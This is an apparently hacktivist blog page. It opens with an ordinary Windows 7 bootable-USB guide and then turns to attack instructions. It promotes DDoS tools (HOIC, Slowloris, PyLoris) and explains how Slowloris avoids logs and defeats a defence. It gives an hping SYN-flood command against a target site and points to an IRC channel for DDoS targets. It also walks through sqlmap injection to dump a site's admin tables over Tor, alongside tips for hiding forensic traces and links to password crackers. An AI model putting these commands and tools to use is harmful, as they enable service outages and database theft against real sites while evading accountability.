1 - TUTORIAL HOW TO MAKE BOOTABLE USB

____________________________________________________________________________________

How to create a bootable Windows 7 USB flash drive

The USB flash drive has replaced the floppy disk drive as the best storage medium for transferring files, but it also has its uses as a replacement for CDs and DVDs. USB drives tend to be higher in capacity than disc media, but since they are more expensive, they cannot (yet) really be used as a replacement. There are reasons why you would, however, choose a USB device over a DVD disc, and bootable software is definitely one of them. Not only is it faster to copy data such as setup files from a USB drive, but during usage the access times are also significantly faster. Therefore, installing something like Windows 7 will work that much faster from a USB drive than from a DVD (and of course, is particularly useful for the PCs without an optical drive; this isn’t something we should just leave for the pirates to enjoy).

This guide will show you two different ways to create a USB flash drive that works just like a Windows 7 DVD. In order to follow this guide, you’ll need a USB flash drive with at least 4GB of free space and a copy of the Windows 7 installation disc.

Windows 7 USB DVD Download Tool

You are normally given this tool when you purchase from the online Microsoft Store .

The easiest way to turn a USB flash drive into a bootable Windows 7 installer is by using the tool Microsoft offers, cunningly named the Windows 7 USB/DVD Download Tool. To get started, download the installer [exe] from Microsoft.com and follow the basic steps to put it onto your computer; you can put it on the computer you plan to install Windows 7 on or another one, it doesn’t matter.

Once it is installed, it should create an icon on your desktop, so double-click that to open. If you can’t find it, use the search function in the Start Menu with a keyword like “USB.” Launching it should give you the above screen, and step one is to find the Windows 7 .ISO file. The tool only accepts .ISO images, so we recommend that you convert yours if it’s in a different DVD image format.

Step two is straightforward: simply choose USB device.

In step three, all you have to do is make sure that you are choosing the correct USB device. If you have other data on the device, move it to your hard drive, another USB device, or somewhere else before proceeding.

The tool will prompt you if it detects data on the device. Once your data is backed up elsewhere, click Erase USB Device.

You will get another prompt warning you that all the data will be wiped. Click Yes to continue.

The format will be very quick, while the copying of the files will take a little bit more time (about 10 to 15 minutes).

Once the process is complete, you should get the above confirmation message. At this point you can close the tool and use the USB drive to install Windows 7. Remember that you’ll have to choose to boot off the USB drive. Before doing so, you may want to open up the USB drive and double click on setup.exe to see if everything looks okay. If you want to be able to do this manually, see the next section, and if you want to be able to install any edition of Windows 7, skip to the section after that.

Manual Creation

Maybe you don’t like that Microsoft violated the GPL with the first version of the above tool (the company has since GPLed the code), or you’re old-school and just love using the command prompt. Regardless of what your reasons are for creating a bootable Windows 7 USB drive manually, we have the scoop on how to do it. First, open the command prompt (if you use UAC make sure to right click it and choose “Run as administrator”), type “diskpart” without the quotes, and hit enter. You can also get here by simply typing “diskpart” without the quotes into the Start Menu and hitting enter.

Now type “list disk” without the quotes and hit enter. Take a look at the Size column and figure out which disk number your USB drive is. Ours is number 1, so we’re going to type “select disk 1” without the quotes and hit enter. Now we’re going to wipe it by typing “clean” without the quotes and hitting enter (make sure to do a backup of the contents if you haven’t already).

At this point we want to prepare the USB drive for the files and make sure it is bootable. Type “create partition primary” without the quotes and hit enter. Then type “select partition 1” without the quotes and hit enter. Next type “active” without the quotes and hit enter. Finally, type “format fs=fat32” without quotes and hit enter (if you choose to use ntfs, you’ll later have to run the “Bootsect.exe /nt60 G:” command to put boot manager compatible files onto your USB flash drive to make it a bootable device). This one will take a while, so go grab a snack, we’ll wait. When that’s done, type “assign” without the quotes and hit enter (this will assign a new drive letter to the USB flash drive).

An AutoPlay window like the one above will appear. Remember the drive letter (in our case it is H:\), close the window, type “exit” without the quotes and hit enter. If you are working with an .ISO image, the best way to do this last part is to mount the file with a program like Virtual Clone Drive. Alternatively, you can extract the files from the .ISO image and simply copy them to the USB drive, but since we’ve been using the command prompt up to this point, we’ll show you how to do the last step with it as well.

If you don’t have the command prompt open, open it with administrative privileges, type “xcopy f:*.* /s/e/f hg:” without the quotes and hit enter. Note that you will likely have to replace “f:” with the drive letter for your Windows 7 DVD and “g:” with the drive letter for your USB flash drive. Don’t worry if install.wim takes a while to copy: it’s easily the biggest file on the disc.

Bonus: install any edition of Windows 7

This is a completely optional step and you only want to do this if you want to be able to choose which edition of Windows 7 to

install. In the command prompt, type “del g:\sources\ei.cfg” without the quotes and hit enter (where g:\ is your USB flash drive).

This will make sure that your Windows 7 installer no longer has a specific version of Windows 7 set as the default, and you will be prompted to choose the version you want to install. Remember that while this gives you a more universal Windows 7 installer, you still need to make sure you are choosing the edition that you own, or you will not be able to activate Windows 7 with the key you have obtained.

____________________________________________________________________________________

2 - TRUECRYPT HERE IS THE GUIDE AND HELP!! USE IT!

____________________________________________________________________________________

TUTORIAL HOW TO TRUECRYPT!http://www.truecrypt.org/

HERE IS TUTORIAL LINK! http://www.truecrypt.org/docs/tutorial

Main Features:

Creates a virtual encrypted disk within a file and mounts it as a real disk.
Encrypts an entire partition or storage device such as USB flash drive or hard drive.
Encrypts a partition or drive where Windows is installed (pre-boot authentication).
Encryption is automatic, real-time (on-the-fly) and transparent.
Parallelization and pipelining allow data to be read and written as fast as if the drive was not encrypted.
Encryption can be hardware-accelerated on modern processors.
Provides plausible deniability, in case an adversary forces you to reveal the password:
Hidden volume (steganography) and hidden operating system.
More information about the features of TrueCrypt may be found in the documentation.

____________________________________________________________________________________

NOW ONCE ALL THIS IS DONE YOU CAN USE THIS GUIDE HERE FOR THE FUN PART OF HACKING!

REASON FOR ALL THIS ABOVE IS SIMPLE:

1. Your main hard drive has nothing on it. Your backup USB Boot DOES!! AND ITS CRYPTED!!

2. Your main computer will be crypted and anything you didn’t authorize to be on it will be REMOVED! Including the traces of anything you don’t want known was installed IE a USB BOOT OS!

3. USB CAN BE BROKEN INTO A MILLION PIECES WITH EASE WERE YOU HAVE A 20$ LOSE THEN RATHER A HARD DRIVE AND OR COMPUTER!

4. MAKE SURE YOU HAVE ALL YOUR TRUECRYPT PASSWORDS 32+ Characters long. I WOULD HIGHLY SUGGEST A 64+ Character one. Use a sentence, a phrase and or anything that will not be easily found or decrypted.

____________________________________________________________________________________

GET A PRIVATE PAID FOR VPN! SPEND THE 5-10$ ITS FOR A GOOD CAUSE! THEN CHECK OUT THE SITES BELOW FOR WHAT YOU THINK WILL WORK BEST FOR YOU!

HOIC aka: High Orbit Ion Cannon Link to Download.

What is HOIC?

The high orbit ion cannon has the following features:

High-speed multi-threaded HTTP Flood

Simultaenously flood up to 256 websites at once

Built in scripting system to allow the deployment of ‘boosters’, scripts designed to thwart DDoS counter measures and increase DoS output.

Easy to use interface

Can be ported over to Linux/Mac with a few bug fixes (I do not have either systems so I do

Ability to select the number of threads in an ongoing attack

Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH and its written in a language where you can do a bunch of really nifty things just read the RealBasic manual, ;] also no Dependencies (single executable)

____________________________________________________________________________________

Slowloris HTTP Dos Link to Download.

What is Slowloris

Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they’ll allow. Slowloris must wait for all the sockets to become available before it’s successful at consuming them, so if it’s a high traffic website, it may take a while for the site to free up it’s sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by Slowloris. This is because other users of the system must finish their requests before the sockets become available for Slowloris to consume. If others re-initiate their connections in that brief time-period they’ll still be able to see the site. So it’s a bit of a race condition, but one that Slowloris will eventually always win - and sooner than later. Slowloris also has a few stealth features built into it. Firstly, it can be changed to send different host headers, if your target is a virtual host and logs are stored seperately per virtual host. But most importantly, while the attack is underway, the log file won’t be written until the request is completed. So you can keep a server down for minutes at a time without a single log file entry showing up to warn someone who might watching in that instant. Of course once your attack stops or once the session gets shut down there will be several hundred 400 errors in the web server logs. That’s unavoidable as Slowloris sits today, although it may be possible to turn them into 200 OK messages instead by completing a valid request, but Slowloris doesn’t yet do that. HTTPReady quickly came up as a possible solution to a Slowloris attack, because it won’t cause the HTTP server to launch until a full request is recieved. This is true only for GET and HEAD requests. As long as you give Slowloris the switch to modify it’s method to POST, HTTPReady turns out to be a worthless defense against this type of attack. This is NOT a TCP DoS, because it is actually making a full TCP connection, not a partial one, however it is making partial HTTP requests. It’s the equivalent of a SYN flood but over HTTP. One example of the difference is that if there are two web-servers running on the same machine one server can be DoSed without affecting the other webserver instance. Slowloris would also theoretically work over other protocols like UDP, if the program was modified slightly and the webserver supported it. Slowloris is also NOT a GET request flooder. Slowloris requires only a few hundred requests at long term and regular intervals, as opposed to tens of thousands on an ongoing basis.

____________________________________________________________________________________

|_| irc.anonops.pro:6667

SSL: irc.anonops.pro:6697

irc.anonops.bz:6667

SSL: irc.anonops.bz:6697

www.anonops.com

Welcome anons to #Setup

Here we will cover the basics you need to know in order to stay safe and get your software configured.

Stop asking us how to hack, how to take down a web site, how to get revenge on someone you know online,

this is _NOT_ what we are about and you will not get support. So stay on topic or kick/ban

VPN:

A vpn hides your real ip and replaces it with the tunnel you are connecting through, this means that you are extremely hard to trace back - not impossible however.

DO NOT use free VPN’s, proxies or TOR. Free VPN’s keep logs of users activity and would happily hand it over to any law enforcement agency. Some suggestions VPN providers that are trusted and don’t keep logs.

1. http://anonine.se

2. http://www.vpntunnel.se

Network testing tools, alternatives to LOIC: (Do NOT use LOIC)

Hping:

hping is a command-line oriented TCP/IP packet assembler/analyzer.

The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Easy to use system, when it has downloaded for your appropriate OS please install and choose to use

Homepage: http://www.hping.org/download.php - Windows/Linux

Pastebin: http://pastebin.com/zzewmMcn

http://www.youtube.com/watch?v=fagjmQi-sBY

http://www.youtube.com/watch?v=fRxnzAWX5ag

HPING COMMAND: hping3 -i u1 -S -p 80 (site)

Slowloris

The low bandwidth, yet greedy and poisonous HTTP client!

This is a Perl program requiring the Perl interpreter with the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long. Slowloris works MUCH better and faster if you have threading, so I highly encourage you to also install threads and threads::shared if you don’t have those modules already.

You can install modules using CPAN:

perl -MCPAN -e ‘install IO::Socket::INET’

perl -MCPAN -e ‘install IO::Socket::SSL’

Homepage: http://ha.ckers.org/slowloris/ - Linux

http://www.youtube.com/watch?v=kPo8wVxsXAA

Hoic:

- High-speed multi-threaded HTTP Flood

- Simultaenously flood up to 256 websites at once

- Built in scripting system to allow the deployment of ‘boosters’, scripts designed to thwart DDoS counter measures and increase DoS output.

- Easy to use interface

- Can be ported over to Linux/Mac with a few bug fixes (I do not have either systems so I do

- Ability to select the number of threads in an ongoing attack

- Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH

and its written in a language where you can do a bunch of really nifty things

just read the RealBasic manual, ;] also no Dependencies (single executable)

Homepage: http://hoic.99k.org/

Download: http://www.mediafire.com/?jkc7924jsa0161z

http://www.youtube.com/watch?v=qmhDQtsbPAk

HOIC BOOSTER Guide: http://pastebin.com/csqLqY9N

Pyloris:

PyLoris is a scriptable tool for testing a server’s vulnerability to connection exhaustion denial of service (DoS) attacks. PyLoris can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.

Homepage: http://motomastyle.com/pyloris/

Sourceforge: http://sourceforge.net/projects/pyloris/

Pastebin http://pastebin.com/MTyHYXJe

Do NOT use Tor for Dos all it does is hit Tor.

Test DOS tools on 127.0.0.1

Do NOT click on random links posted in channels.

Some of these are IP grabbers, honeypots or may contain executable code. Do so at your own risk.

Do NOT give out personal information: name, email, passwords, etc. (Use your head)

Main Channel: #anonops

IRC/Anonymity help only: #opnewblood

Target Info: #DDOS

Software support/configuring: #Setup

———————————————————-

Other Languages: belgique: #opbelgium | čeština: #czech, cesi a slovaky #czsk |

dansk: #denmark | nederlands: #dutch | eesti keel: #estonia | francais: #francophone |

deutsch: #germany | italiano: #italy | norsk: #norway | język polski: #poland |

español: #hispania | brasil: #anonymousbr #ataque | mexico: #opmexico |

For a full list of channels: /list on IRC

Quick channel access if you do not have your own IRC client installed.

Webchat: http://webchat.anonops.pro/

http://search.mibbit.com/networks/AnonOps

Thank you all for reading and using my guide. This is only here to help those who want to do the right things. This is in no way a tutorial for you to be corrupt. But to be a voice. To be heard to make yourself seen. Join as one and be voice for a cause. Remember folks we are here to help each other.

CodeCompiler

#Setup

#Anonops

#Hack

#CodeChat

#DDos

Special thanks also goes out to those that stand up for the weak.

“The purpose of war is peace”

Saint Augustine - 354-430ad

By CodeCompiler Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

- #anonymous
- #Anon
- #anonymiss
- #antisec
- #anonfamily
- #antiacta
- #antiSOPA
- #antipipa
- #community
- #citizens
- #democracy
- #expectus
- #evolution
- #freeweb
- #fight
- #freedom
- #free
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
- #NO-ACTA
- #ows
1 year ago
Permalink

View Separately

SQLMAP For Dummies v1.0

Required for use: BackTrack 5 R1

Start your BackTrack 5 R1 (BT5) and start sqlmap, it can be found in /pentest/database/sqlmap/.

Now lets get started!

First we need a webpage, this normally is done by hand or by using dorks in google. To find out if a page is vulnerable to an injection we do this:

http://localhost.com/index.php?id=1337’

Notice the ‘ here: ^

This should give you a pretty error and a good start!

Lets open sqlmap!

So the first you need to learn is options, or settings you have to apply in sqlmap. The base is:

python sqlmap.py -u <website>

With a website we would simply do it like this

python sqlmap.py -u http://localhost/index.php?id=1337

(note we did not add the ‘ here)

-u stands for Url and tells sqlmap THIS is our url. But we have to add more options for sqlmap to work:

(note the following options use double dashes)

- -dbs to find DataBases

- -users to find users.

python sqlmap.py -u http://localhost/index.php?id=1337 - -dbs (and/or) - -users

(for the sake of lenght we will be assuming you used - -dbs in this tutorial)

After this command is ran you should come up with 0 results, or some results. If you read the text you might be able to find some databases, and if you do. Congratz!

Should look like this:

available databases [2]:

[*] database1

[*] database2

Now to the fun part!

python sqlmap.py -u http://localhost/index.php?id=1337 - -tables -D database1

This tells the program to find tables (- -tables) in database (-D) names: database1.

Once you execute this you will find (maybe) tons of tables. Locate the one you want…lets call it admin!

python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin

Now you should see the info of the table admin. But now we should be able to dump it! This can be done by - -dump or - -dump-all.

Examples:

python sqlmap.py -u http://localhost/index.php?id=1337 - -tables -D database1 - -dump-all

python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin - -dump

- -dump dumps the selected tables content, - -dump-all dumps EVERYTHING!

But, we should be secure?

Tor with SQLMAP:

First find /etc/apt/sources.list open it and add

deb http://deb.torproject.org/torproject.org lucid main

Open the terminal and use this commands:

gpg - -keyserver keys.gnupg.net —recv 886DDD89

gpg - -export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

And now we need more commandos ran as root:

apt-get update apt-get install tor tor-geoipdb apt-get install polipo

Start tor: /etc/init.d/tor start grab the copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf

Go to /etc/polipoconfig and replace the file with the one above. restart polipo: /etc/init.d/polipo restart

Congratz! now you can run sqlmap with TOR!

python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin —dump —tor —random-agent

Happy safe hacking!

By Matrix Productions NO©™

http://www.twitter.com/TheAnonMatrix

Source:

http://www.coresec.org/2011/04/24/sqlmap-with-tor/

https://www.torproject.org/docs/debian.html.en#ubuntu

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

- #SQLI
- #anonymous
- #Anon
- #anonymiss
- #antisec
- #anonfamily
- #antiacta
- #antiSOPA
- #antipipa
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #community
- #citizens
- #democracy
- #expectus
- #evolution
- #free
- #freedom
- #freeweb
- #fight
- #GameOn
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
1 year ago
2
Permalink

View Separately

Get Involved

EVERYTHING HAS BEEN DOWNLOAD TO A SANDBOX, SCANNED, FOUND TO BE SAFE, AND UPLOADED BY US.

It you get a 509 page due to high activity when downloading you can get everything from our Pirate Bay account.

Anonymous Care Package:

Includes the following as a zipped folder:

AnonymousMask.pdf
AnonymousRiotGuide.pdf
AnonymousSecurityStarterHandbook.pdf
Artwork
DeclarationOfIndependenceOfCyberspace.txt
Firefox-plugins
FirstAid-Made-Easy.pdf
FirstAid-MilitarManual.pdf
FreeSoftwareFoundation-BypassingCensorship.pdf
NSA-HowTo-Safely-Publish-WordtoPDF.pdf
ramdisk.zip
RSF.org-Handbook-For-CyberDissidents.pdf
Tor-Howto-Windows.mov

DOWNLOAD

Tool Kits:

Ballon Banner Manual (Download)
Bird Dog Manual (Download)
End of America Action Guide (Download)
Ruckus Scouting Action Visuals (Download)
Ruckus Scouting Manual (Download)
Hacking - Firewalls And Networks How To Hack Into Remote Computers (Download)
Wireless Hacking (Download)
Handbook for bloggers and cyber-dissidents (Download)
Rights of Protesters (Download)
If An Agent Knocks (Download)
Anon Street Medic guide (Download)

Documentation:

UK General

UK Water Fluoridation Map (Download)
UK Water Fluoridation Policy (Download)
Operations in the UK: The Defense Contribution to Resilience (Download)

Change Agents

Common Purpose Exposed (Website)
Searchlight and Hate v1 (Download)
Searchlight and Hate v2 (Download)

European Union

Europaische WirtschaftsGemeinschaft (Zipped Archive)
England Region Map (Download)
Echelon Report (Download)
Indect Deliverable 4 2009 (Download)

Bilderberg Group

1. Council on Foreign Relations

Internet Governance in an Age of Cyber Insecurity (Download)

Pandemic Influenza: Science, Economics, and Foreign Policy: Session One: The Science (Download)

2. Rockefeller Foundation

1933 Annual Report (Download)
1934 Annual Report (Download)
1935 Annual Report (Download)
1968 Annual Report (Download)
1969 Annual Report (Download)
1988 Annual Report (Download)
1997 Review of Anti-Fertility Vaccines (Download)

New World Order

National Security Strategy - May 2010 (Download)
2025: Global Governance (Download)
Establishment of the Council of Governors (Download)
Establishing the President’s Management Advisory Board (Download)
Army Regulation 210–35: Civilian Inmate Labor Program (Download)

United States Intelligence Services

U.S. counterintelligence investigation into WikiLeaks (Download)
National Exercise Program 2007-2011 (Download)
National Level Exercise 2010 (NLE 10) (Download)
NSA Redaction Instructions (Download)
Operation Megiddo (Download)
PNAC: Rebuilding America’s Defenses (Download)
U.S. Air Force Civil Disturbance Manual (Download)

United Nations Population Fund (UNFPA)

Draft country programme document for China (Download)

World Heath Organisation

1976 WHO Expanded Programme of Research, Development and Research Training in Human Reproduction Report (Download)
1978 Report by the Task Force on Immunological Methods for Fertility Regulation (Download)
1986 bulletin of the World Health Organization (Download)
1992 Fertility Regulating Vaccines (Download)
Research on the Development of Methods of Fertility Regulation (2001) (Download)
2003 Annual Report (Download)

By YourAnonNews Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Long live the ones who dare.

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

- #anonymous
- #Anon
- #anonymiss
- #antisec
- #antiacta
- #anonfamily
- #antiSOPA
- #antipipa
- #community
- #citizens
- #Unite
- #SailStrong
- #democracy
- #d0x
- #evolution
- #expectus
- #free
- #freedom
- #fight
- #freeweb
- #GameOn
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #interwebz
- #insurgency
- #insurgent
- #LuLzWar
- #LULZ
1 year ago
Permalink

Page 1 of 2

← Newer • Older →

Guifi.net, a project for everybody

Open, Free and Neutral Network
Internet for everybody

datalove.me - a symbol you put in your blog or on your website, print on postcards or in books.

How to Use I2P to Host and Share Your Secret Goods on the Dark Web—Anonymously

Get Started!

Step 1 Start I2P

Step 2 Check Your Address Book

Step 3 Add Your Eepsite Content

Step 4 Servers, Tunnels, and Other Fun Things

Step 5 More Address Books!

In Closing

XSQL SCANNER: SECURITY AUDIT TOOL FOR MS-SQL & MYSQL & DATABASE PASSWORD CRACKER

MAGICTREE V1.1 – PENETRATION TESTING PRODUCTIVITY TOOL

BRUTUS PASSWORD CRACKER – DOWNLOAD BRUTUS-AET2.ZIP AET2

BEST BOOKS ON HACKING AND DEFENSE SECURITY

THE ONLY TRUE GUIDE TO LEARNING HOW TO HACK

Sandcat Browser 2.0 Released, Penetration Testing Oriented Browser

BackTrack 5 R2 was released on 1st of March, 2012.

STARTUP GUIDE

How to create a bootable Windows 7 USB flash drive

Windows 7 USB DVD Download Tool

Manual Creation

Bonus: install any edition of Windows 7

Get Involved

About

Twitter

Guifi.net, a project for everybody

Open, Free and Neutral NetworkInternet for everybody

datalove.me - a symbol you put in your blog or on your website, print on postcards or in books.

How to Use I2P to Host and Share Your Secret Goods on the Dark Web—Anonymously

Get Started!

Step 1 Start I2P

Step 2 Check Your Address Book

Step 3 Add Your Eepsite Content

Step 4 Servers, Tunnels, and Other Fun Things

Step 5 More Address Books!

In Closing

XSQL SCANNER: SECURITY AUDIT TOOL FOR MS-SQL & MYSQL & DATABASE PASSWORD CRACKER

MAGICTREE V1.1 – PENETRATION TESTING PRODUCTIVITY TOOL

BRUTUS PASSWORD CRACKER – DOWNLOAD BRUTUS-AET2.ZIP AET2

BEST BOOKS ON HACKING AND DEFENSE SECURITY

THE ONLY TRUE GUIDE TO LEARNING HOW TO HACK

Sandcat Browser 2.0 Released, Penetration Testing Oriented Browser

BackTrack 5 R2 was released on 1st of March, 2012.

STARTUP GUIDE

How to create a bootable Windows 7 USB flash drive

Windows 7 USB DVD Download Tool

Manual Creation

Bonus: install any edition of Windows 7

Get Involved

About

Twitter

Open, Free and Neutral Network
Internet for everybody